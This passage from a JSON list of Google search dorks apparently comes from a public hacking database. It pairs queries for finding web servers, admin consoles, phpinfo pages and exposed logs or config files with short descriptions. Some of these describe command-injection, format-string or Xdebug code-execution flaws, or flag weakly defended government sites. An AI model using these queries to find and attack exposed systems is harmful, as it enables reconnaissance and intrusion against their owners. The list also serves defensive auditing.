a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/5.0 server at\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/6.0\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"OmniHTTPd/2.10\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"OpenSA/1.0.4\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Red Hat Secure/2.0\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Red Hat Secure/3.0 server at\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "sEDWebserver * server +at intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "fitweb-wwws * server at intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"httpd+ssl/kttd\" * server at intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"powered by\" \"shoutstats\" hourly daily", "description": "shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers."}, {"dork": "intitle:\"Shoutcast Administrator\"", "description": "shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers."}, {"dork": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "description": "First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical fileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm"}, {"dork": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "description": "Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag"}, {"dork": "intitle:\"Directory Listing, Index of /*/\"", "description": "Vendor page:\"Einfache HTTP-Server-Software f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr privates Homepage-Hosting oder gro\u00c3\u0192\u00c6\u2019\u00c3\u2026\u00c2\u00b8e Uploads.\"small HTTP server software for private hompage hosting or big uploads."}, {"dork": "intitle:\"error 404\" \"From RFC 2068 \"", "description": "WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach."}, {"dork": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "description": "\"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail\". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl. Details Vulnerable Systems: * Open Webmail versions 2.20, 2.21 and 2.30 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below) The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a \";\", \"|\" or \"( )\" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, \"nobody\" or \"www\", e.g.)."}, {"dork": "\"Switch to table format\" inurl:table|plain", "description": "This is an index page of OReilly WebSite Professional.WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com"}, {"dork": "\"About Mac OS Personal Web Sharing\"", "description": "Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement."}, {"dork": "intitle:\"Welcome To Xitami\" -site:xitami.com", "description": "Default Xitami installationAdditionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.It can be run by entering the following urlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)"}, {"dork": "intitle:\"Resin Default Home Page\"", "description": "Resin provides a fast standalone web server. This search locates those servers based on the title of the default page."}, {"dork": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "description": "WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads. All servers can be accessed anonymously"}, {"dork": "inurl:2506/jana-admin", "description": "The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter."}, {"dork": "XAMPP \"inurl:xampp/index\"", "description": "XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.-allows you to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybe some more things ;-)"}, {"dork": "\"Netware * Home\" inurl:nav.html", "description": "Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager!"}, {"dork": "inurl:oraweb -site:oraweb.org", "description": "Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.So the Oracle webserver is very often named oraweb."}, {"dork": "intitle:\"welcome to mono xsp\"", "description": "XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix"}, {"dork": "Powered.by.RaidenHTTPD intitle:index.of", "description": "RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows"}, {"dork": "yaws.*.server.at", "description": "YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver. Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client."}, {"dork": "intitle:\"IPC@CHIP Infopage\"", "description": "web server detection for IPC@chip embedded webserverThe dork uses the webserver's infopage which reveals some very interesting information.See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767"}, {"dork": "intitle:\"Index of *\" mode links bytes last-changed name", "description": "thttpd is is a webserver written in C and should compile and run on most unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions: * FreeBSD* NetBSD* BSD/OS* Solaris* Tru64 / DIGITAL UNIX / OSF/1* SunOS* Linux* HP-UX* MacOS X* UnixWare* AMIGAOS* NCR MP-RAS BASE 3.02 (EISA/MCA)* Sega Dreamcast* Compaq iPaq 3765* Windows 2000/XP (port of 2.07 only)"}, {"dork": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "description": "Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache."}, {"dork": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "description": "List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods."}, {"dork": "intext:\"Target Multicast Group\" \"beacon\"", "description": "\"... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network.\"see h**p://beacon.dast.nlanr.net"}, {"dork": "intitle:\"Apache Status\" | intext:\"Apache Server Status\"", "description": "This dork gives,\nApache Server Status\nServer Version: \nServer Built: \nCurrent Time: \nRestart Time: \nParent Server Generation: \nServer uptime: \n-Xploit"}, {"dork": "inurl:phpsysinfo/index.php?disp=dynamic", "description": "These Dork show a lot of info about servers behind the webpages.\nEnjoy healthy.\nBest Regard.\nRootkit Pentester."}, {"dork": "intitle:\"HFS\" \"Server Uptime\" \"Server time\"", "description": "HttpFileServer with open access\nCategory: Web Server Detection\n@theevilbit - Csaba Fitzl"}, {"dork": "inurl:/php/info.php", "description": "# Google Dork: inurl:/php/info.php\n# Date: 11/25/2016\n# Exploit Author: Cameron Maerz @pwns4cash\n# Version: php\n# Tested on: all\nI noticed a very similar dork in the database, and also have noticed a\ntrend in what hosting companies are suggesting to their customers. Thus:\ninurl:/php/info.php\nThe results returned were different than the similar dork."}, {"dork": "\"PHP Credits\" \"Configuration\" \"PHP Core\" ext:php inurl:info", "description": "Dork: \"PHP Credits\" \"Configuration\" \"PHP Core\" ext:php inurl:info\nAnother way to look Phpinfo()\nGoogle Dork by INILERM"}, {"dork": "inurl:user_guide intext:\"CodeIgniter User Guide\"", "description": "*Explanation: *CodeIgniter comes with a default offline user guide which\nmost of the installed applications don't remove and gets indexed.\n*Google dork: *inurl:user_guide intext:\"CodeIgniter User Guide\"\nThanks\nSreenath Sasikumar"}, {"dork": "ext:svc inurl:wsdl", "description": "this dork will return Web Services Description Language which will expose\nwebservices\nsubmitted by: Mohammad Al-Nasser"}, {"dork": "inurl:/pub/ inurl:_ri_", "description": "*Google dork description: *Servers using Oracle Responsys\n*Google Search:* inurl:/pub/ inurl:_ri_\n*Submitted by:* Alfie"}, {"dork": "inurl:/_catalogs", "description": "*Google dork description: *Identify sharepoint servers\n*Google Search: *inurl:/_catalogs\n*Submitted by:* Alfie"}, {"dork": "inurl:phpmyadmin/themes intext:\"pmahomme\"", "description": "This will help to identify websites that host phpmyadmin by detecting\r\nthe exposed theme files\r\n\r\nVisakh V Nair"}, {"dork": "inurl:readme.md intext:\"Laravel\"", "description": "Reason:Lavavel package comes with readme.md and Since it's a part of\r\ndefault package it get indexed and able to identify the framework using\r\nthis dork which can be further used for exploiting."}, {"dork": "\"Application Blocked!\" \"Google bot\"", "description": "Pages with black list or behind Fortigate firewall.\r\nRegards.\r\nRootkit Pentester."}, {"dork": "inurl:\"server-status\" \"Server Version: Apache/\" \"Server Built: \" \"Server uptime:\" \"Total accesses\" \"CPU Usage:\"", "description": "inurl:\"server-status\" \"Server Version: Apache/\" \"Server Built: \" \"Server uptime:\" \"Total accesses\" \"CPU Usage:\"\r\n\r\nAbove mentioned dork shows URL which has Apache server-status file openly accessible. Apache server status file discloses all the request which are send to server and most of the time it discloses hidden urls or parameter's call."}, {"dork": "\"var miner = new CoinHive\" intext:document.domain", "description": "*Google *dork* description: *sites running the CoinHive crypto miner\r\n\r\n*Google Search:* \"var miner = new CoinHive\" intext:document.domain\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "intitle:\"Axis Happiness Page\" \"Examining webapp configuration\"", "description": "Reveals sensitive information including a full path disclosure in Apache Axis \r\n\r\nAlwin Warringa"}, {"dork": "intitle:\"miniProxy\"", "description": "This dork finds this little script: (https://github.com/joshdick/miniProxy).\r\nThis will provide free proxies to use for browsing or, as it is usable with\r\nGET parameters, to use with cURL.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "inurl:rvsindex.php & /rvsindex.php?/user/login", "description": "*Google* dork *description: *sites running the rvsitebuilder CMS\r\n\r\n*Google Search: inurl:rvsindex.php & /rvsindex.php?/user/login*\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "intitle:\"Apache2 Debian Default Page: It works\"", "description": "intitle:\"Apache2 Debian Default Page: It works\"\r\n\r\nDefault Apache2 html page\r\n\r\nManhNho"}, {"dork": "intitle:\"apache tomcat/\" + \"Find additional important configuration information in:\"", "description": "intitle:\"apache tomcat/\" + \"Find additional important configuration\r\ninformation in:\"\r\n\r\nApache Tomcat web server detected!!!\r\n\r\nManhNho"}, {"dork": "\"RDServer Product information\" | inurl:\"/rdagent.jsp\"", "description": "\"RDServer Product information\" | inurl:\"/rdagent.jsp\"\r\n\r\nThis dork show RDServer Product information\r\n\r\nManhNho"}, {"dork": "inurl:composer.json codeigniter -site:github.com", "description": "*This can be used to identify the code hosted by different companies that\r\nare created with CodeIgniter PHP framework.*\r\n*Thanks*\r\n*Anwar Ayoob*"}, {"dork": "intitle:\"apache tomcat/\" \"Apache Tomcat examples\"", "description": "This dork show many example of Server Apache Tomcat.\r\n\r\n\r\nKhanhNNVN"}, {"dork": "intitle:HTTP Server Test Page powered by CentOS", "description": "intitle:HTTP Server Test Page powered by CentOS\r\n\r\nCentOS detected\r\n\r\nManhNho"}, {"dork": "inurl:tests/mocks intext:autoloader", "description": "*inurl:tests/mocks intext:autoloader*\r\n\r\nThis will help us identify websites made with codeigniter.\r\n\r\n\r\nThank you\r\nAthira M"}, {"dork": "inurl:/_hcms/", "description": "Google dork *description: * Get all sites using Hubspot's Content Mangement\r\nSystem (CMS)\r\n\r\n*Google Search: *inurl:/_hcms/\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "intext:\"Powered by Sentora\" -github.com", "description": "Sites using Sentora CMS.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Powered by Nesta\"", "description": "Nesta, a Ruby CMS\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "Coldbox | contentbox | commandbox \"Powered by ContentBox\"", "description": "ContentBox content management tools and CMS.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Powered by Typesetter\"", "description": "Typesetter CMS dorks\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Powered by (Quantum | Quantum CMS | CMS)", "description": "Sites using Quantum CMS builder\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"This server is operated by OpenX.\"", "description": "Find websites using the OpenX web server software.\r\n~ CrimsonTorso"}, {"dork": "intitle:\"Sucuri WebSite Firewall - Access Denied\"", "description": "intitle:\"Sucuri WebSite Firewall - Access Denied\"\r\n\r\nSucuri Firewall detected\r\n\r\nManhNho"}, {"dork": "intext:\"Powered by phpSQLiteCMS\" | intitle:\"phpSQLiteCMS - A simple & lightweight CMS\"", "description": "phpSQLiteCMS detect\r\n\r\nManhNho"}, {"dork": "intitle:livezilla \"Server Time\"", "description": "intitle:livezilla \"Server Time\"\r\n\r\nDork to locate LiveZilla consoles and version, as well as additional\r\ninformation about the server such as PHP version."}, {"dork": "intitle: \"Welcome to nginx!\" + \"Thank you for using nginx.\"", "description": "nginx detect\r\n\r\nManhNho"}, {"dork": "intext:\"Powered by Abyss Web Server\"", "description": "Machines running Abyss web server.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n\r\n@brulliant"}, {"dork": "\"Powered by vShare\"", "description": "Find websites that are used to upload files and videos.\r\n\r\n~ CrimsonTorso"}, {"dork": "intitle:Test Page for the Nginx HTTP Server on Fedora", "description": "Web server detected - Happy new year 2019\r\n\r\nManhNho"}, {"dork": "intext:\" - 2019 Cott Systems, Inc.\"", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ Local Government Websites (American) ++\r\n\r\nintext:\" - 2019 Cott Systems, Inc.\"\r\n\r\nCott Systems develops a lot of the local government document\r\nsearch portals in the U.S.\r\n\r\nData you can find:\r\n - Search Portals for:\r\n - Clerk Offices\r\n - Personal Data\r\n - Property Data (Tax, Debt, Deed etc.)\r\n - Internal Search engines\r\n - Foothold in potentially vulnerable .gov Websites\r\n - local government is usually not well funded, their cybersecurity is not very good\r\n chances of finding bugs are very high\r\n\r\n++ 307 results at the time of writing ++\r\n\r\n\r\nDISCLAIMER:\r\nThe vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system.\r\nThis dork is made by myself, I give you permission to share it as you please,\r\nI would appreciate a shoutout !"}, {"dork": "\"I have been invoked by servletToJSP\"", "description": "# Exploit Title: i have been invoked by servletToJSP\r\n# Google Dork: i have been invoked by servletToJSP\r\n# Date: January 12, 2019\r\n# Exploit Author: g.go\r\n# Vender Homepage: g.goog.gogooggo@gmail.com\r\n# Software Link: tomcat.apache.org\r\n# Version: 7-9\r\n# Description: find many improperly set up tomacat servlets\r\n\r\n\r\n#### Google Dork\r\ni have been invoked by servletToJSP"}, {"dork": "\"Proudly created with Wix.com\"", "description": "AUTHOR: FlyingFrog\r\n\r\nTwitter: @ItsKarl0z\r\n\r\n++ Find Websites made with WIX ++\r\n\r\n\"Proudly created with Wix.com\"\r\n\r\n- 13.500.000 results at the time of writing"}, {"dork": "\"Powered by BOINC\"", "description": "Find websites powered by BOINC.\r\n~ CrimsonTorso"}, {"dork": "intitle:\"WAMPSERVER homepage\" \"Server Configuration\" \"Apache Version\"", "description": "Dork for instances of WAMPSERVER homepages.\r\n\r\nDork by Rootkit Pentester."}, {"dork": "inurl:jsmol.php", "description": "Moodle sites using Jsmol."}, {"dork": "intext:\"Powered by GetSimple\" -site:get-simple.info", "description": "This will find sites using the GetSimple CMS."}, {"dork": "inurl:OrganizationChart.cc", "description": "This dork finds all website using ADSelfService and authorizing guest access to the LDAP directory. Access name, mail, mobile number, function...\r\n\r\n# Exploit Title: ADSelfService\r\n# Google Dork: inurl:OrganizationChart.cc\r\n# Date: June 14, 2019\r\n# Exploit Author: mcandberry\r\n# Vendor Homepage: https://www.manageengine.com/"}, {"dork": "intext:\"Brought to you by eVetSites\"", "description": "List of sites all hosted by eVetSites, hosting platform for veterinarians\r\n\r\nZerconil"}, {"dork": "inurl:phpinfo.php intext:build 2600", "description": "finds web servers that have been unmaintained for literal decades.\r\n\r\ninurl:phpinfo.php finds web servers running php and giving system info,\r\n\r\nintext:build 2600 finds XP machines, meaning that you usually get very\r\noutdated PHP and Apache versions."}, {"dork": "inurl:/server-status + \"Server MPM:\"", "description": "inurl:/server-status + \"Server MPM:\"\r\n\r\nApache server-status\r\n\r\nManhNho"}, {"dork": "intitle:\"IIS Windows Server\" -inurl:\"IIS Windows Server\"", "description": "web server detection:\r\nintitle:\"IIS Windows Server\" -inurl:\"IIS Windows Server\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Apache2 Ubuntu Default Page: It works\"", "description": "web server detection:\r\nintitle:\"Apache2 Ubuntu Default Page: It works\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"WebPortal?bankid\"", "description": "#Google Dork: \r\ninurl:\"WebPortal?bankid\u201c\r\n\r\n#Description: \r\nSensitive Information: List of banks in ger hosted by the same hoster\r\n\r\n#Author: \r\nProSec GmbH - Tim Schughart, Matthias Gilles, Christoph Hein"}, {"dork": "inurl:/phpmyadmin/changelog.php -github -gitlab", "description": "Google Dork Description :\r\n\r\n inurl:/phpmyadmin/changelog.php -github -gitlab\r\n\r\nSubmited: 2019-08-29\r\n\r\n# Exploit Title: Phpmyadmin changelog file\r\n# Date: 2019-08-29\r\n# Vendor Homepage: N/A\r\n# Version: any\r\n# Exploit Author: 24Nitin\r\n# Contact: https://www.linkedin.com/in/nitin-kumar-125684166\r\n# Website: https://www.tftus.com/"}, {"dork": "inurl:/iisstart.htm intitle:\"IIS7\"", "description": "Web Server Detection:\r\n\r\ninurl:/iisstart.htm intitle:\"IIS7\"\r\ninurl:/iisstart.htm intitle:\"IIS Windows Server\"\r\nintitle:\"Microsoft Internet Information Services 8\"\r\ninurl:/iisstart.htm intitle:\"IIS Windows\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/server-status intext:\"Apache server status for\"", "description": "Files containing Juicy info:\r\n\r\nsite:*/server-status intext:\"Apache server status for\"\r\nsite:*/server-info intext:\"Apache server Information\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"server at\"", "description": "Another way to spot Apache web servers in case the service name is hidden.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" \"Served by\" \"Web Server\"", "description": "LiteSpeed Webservers\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"Served by Sun-ONE\"", "description": "Sun-ONE web servers\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"Welcome to nginx!\" intext:\"Welcome to nginx on Debian!\" intext:\"Thank you for\"", "description": "Web Server Detection:\r\n\r\nintitle:\"Welcome to nginx!\" intext:\"Welcome to nginx on Debian!\"\r\nintext:\"Thank you for\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Welcome to JBoss\"", "description": "This dork for JBoss AS entry page even if your JMX console is protected.\r\n*intitle:\"Welcome to JBoss\" *\r\n\r\nPunit Darji (Rapidsafeguard)\r\n(twitter.com/Rapidsafeguard)"}, {"dork": "site:ftp.*.com \"Web File Manager\"", "description": "This google dork searches for \"Rumpus FTP Web File Manager\".\r\n\r\nDork: site:ftp.*.com \"Web File Manager\"\r\n\r\nHarshit Shukla"}, {"dork": "intitle:\"Web Server's Default Page\" intext:\"hosting using Plesk\" -www", "description": "Web Server Detection\r\n\r\n*Ubaid Ahmed*\r\n\r\n*https://UbaidAhmed.com - Life is like riding a\r\nbicycle, you don\u2019t fall off unless you plan to stop peddling*"}, {"dork": "intitle:\"index of\" \"powered by apache \" \"port 80\"", "description": "Google Dork Query to find out insecure Apache Servers running on Port 80.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"powered by apache \" \"port 80\"*"}, {"dork": "\"Powered by phpBB\" inurl:\"index.php?s\" OR inurl:\"index.php?style\"", "description": "# Google Dork: \"Powered by phpBB\" inurl:\"index.php?s\" OR\r\ninurl:\"index.php?style\"\r\n\r\n# By using this dork, vulnerable web sites running phpBB can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"This is the default welcome page used to test the correct operation of the Apache2 server\"", "description": "Category: Web Server Detection\r\nNicholas Doropoulos"}, {"dork": "intitle:\"index of\" \"debug.log\" OR \"debug-log\"", "description": "# Google Dork: intitle:\"index of\" \"debug.log\" OR \"debug-log\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"docker.yml\"", "description": "Dork: intitle:\"index of\" \"docker.yml\"\r\nDescription: This Google dork lists out docker configuration details stored\r\nin a file named \"docker.yml\" for a drupal cms website.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\":8088/cluster/apps\"", "description": "##################################################################################################################################\r\n# Dork Title: to Find Apache Hadoop\r\n# Google Dork: inurl:\":8088/cluster/apps\"\r\n# Date: 22.05.2020\r\n# Author: Ozer Goker\r\n##################################################################################################################################"}, {"dork": "\"index of /private\" -site:net -site:com -site:org", "description": "# Dork: \"index of /private\" -site:net -site:com -site:org\r\n\r\nThis dork is very very important for indexed information.\r\n\r\nThank you\r\nAshish More"}, {"dork": "inurl:\"id=*\" & intext:\"warning mysql_fetch_array()\"", "description": "Google Dork: inurl:\"id=*\" & intext:\"warning mysql_fetch_array()\"\r\nDescription: List out all pages vulnerable to SQL Injection\r\nAuthor: Krushna Lipane"}, {"dork": "intext:\"index of /\" \"Index of\" access_log", "description": "intext:\"index of /\" \"Index of\" access_log\r\n\r\nBY\r\n\r\nRishabh Chaplot\r\nThank You!\r\n----\r\nRegards,\r\nRishabh Chaplot"}, {"dork": "intitle:\"Microsoft Internet Information Services 8\" -IIS", "description": "Google Dork: intitle:\"Microsoft Internet Information Services 8\" -IIS\r\n\r\nDescription: This dork detects all IIS version 8 servers in search engine.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intitle:\"Monsta ftp\" intext:\"Lock session to IP\"", "description": "# Author:Edwyn Sanders\r\n# Date: 23-08-2020\r\n# Dork: intitle:\"Monsta ftp\" intext:\"Lock session to IP\"\r\n# Description: shows the websites that use the ftp service of the Monsta Ftp company\r\n\r\n\r\nMgter Edwyn Roberto Sanders Rivera\r\nCatedr\u00e1tico\r\nUniversidad Tecnol\u00f3gica de Honduras , UTH"}, {"dork": "intitle:\"Lists Web Service\"", "description": "# Google Dork: intitle:\"Lists Web Service\"\r\n# Exposed SharePoint (Lists Web Service).\r\n# Date: 15/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"Pi-hole Admin Console\"", "description": "# Google Dork: allintitle:\"Pi-hole Admin Console\"\r\n# Pi-hole Admin Consoles.\r\n# Date: 17/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:Snoop Servlet", "description": "# Dork Title: to Find Snoop Servlet\r\n# Google Dork: intitle:Snoop Servlet\r\n# Date: 23.09.2020\r\n# Author: Ozer Goker"}, {"dork": "\"Powered by 123LogAnalyzer\"", "description": "Find Private and/or files containing sensitive or restricted information\r\nvia LogAnalyzer stored on the network.\r\n~ Strontium"}, {"dork": "inurl:_vti_bin/Authentication.asmx", "description": "# Google Dork: inurl:_vti_bin/Authentication.asmx\r\n# Date: 10/11/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nEmail: javierbernardo001@gmail.com"}, {"dork": "allintext:\"Index Of\" \"sftp-config.json\"", "description": "Dear Team,\r\n\r\n# Exploit Title: allintext:\"Index Of\" \"sftp-config.json\"\r\n# Google Dork: allintext:\"Index Of\" \"sftp-config.json\"\r\n# Date: 14/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\nPlease find the attached txt file.\r\n\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "ext:php | intitle:phpinfo \"published by the PHP Group\"", "description": "Author: Rahul Parmar\r\nGoogle Dork: ext:php | intitle:phpinfo \"published by the PHP Group\"\r\nExpose PHPinfo file"}, {"dork": "inurl:/phpPgAdmin/browser.php", "description": "Google Dork: inurl:/phpPgAdmin/browser.php\r\n\r\nDescription: This Google Dork is used for detecting phpPgAdmin PostgreSQL\r\nServers.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intext:\"Healthy\" + \"Product model\" + \" Client IP\" + \"Ethernet\"", "description": "# Google Dork: intext:\"Healthy\" + \"Product model\" + \" Client IP\" + \"Ethernet\"\r\n# Cisco Meraki configuration panels with juicy info...\r\n# Date: 18/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"SonarQube\" + \"by SonarSource SA.\" + \"LGPL v3\"", "description": "#Google Dork: intext:\"SonarQube\" + \"by SonarSource SA.\" + \"LGPL v3\"\r\n\r\n#Description: viewing various source codes of business applications\r\n\r\n#Author: Paulo Gualter (https://www.linkedin.com/in/paulogualter)"}, {"dork": "inurl:/xprober ext:php", "description": "Google Dork : inurl:/xprober ext:php\r\n\r\nThis will give all the X Prober Server info disclosed- A probe program for\r\nPHP environment\r\n(Sensitive Data Exposure)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate : 19/12/2020"}, {"dork": "inurl:\"/phpmyadmin/user_password.php", "description": "Google Dork: inurl:\"/phpmyadmin/user_password.php\r\nDate : 22nd December 2020\r\nImpact : Sensitive Information\r\nAuthor : Mukul Trivedi\r\n\r\n\r\n[image: Screenshot Chrome.jpg]"}, {"dork": "inurl:/config/device/wcd", "description": "# Google Dork: inurl:/config/device/wcd\r\n# Date: 1/11/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nBuenos Aires - Argentina"}, {"dork": "inurl:?XDEBUG_SESSION_START=phpstorm", "description": "#Google Dork :\r\n\r\ninurl:?XDEBUG_SESSION_START\r\n\r\n#Summary:\r\n\r\nXdebug is a php extension that allows to debug php pages, remotely by using DGBp protocol.\r\n- Code execution is possible through eval or property_set xdebug commands.\r\n- Attacker is also able to read content of file using source xdebug command\r\n\r\n#Date : 24/01/2021\r\n#Exploit Author : Lutzenfried (Cl\u00e9ment 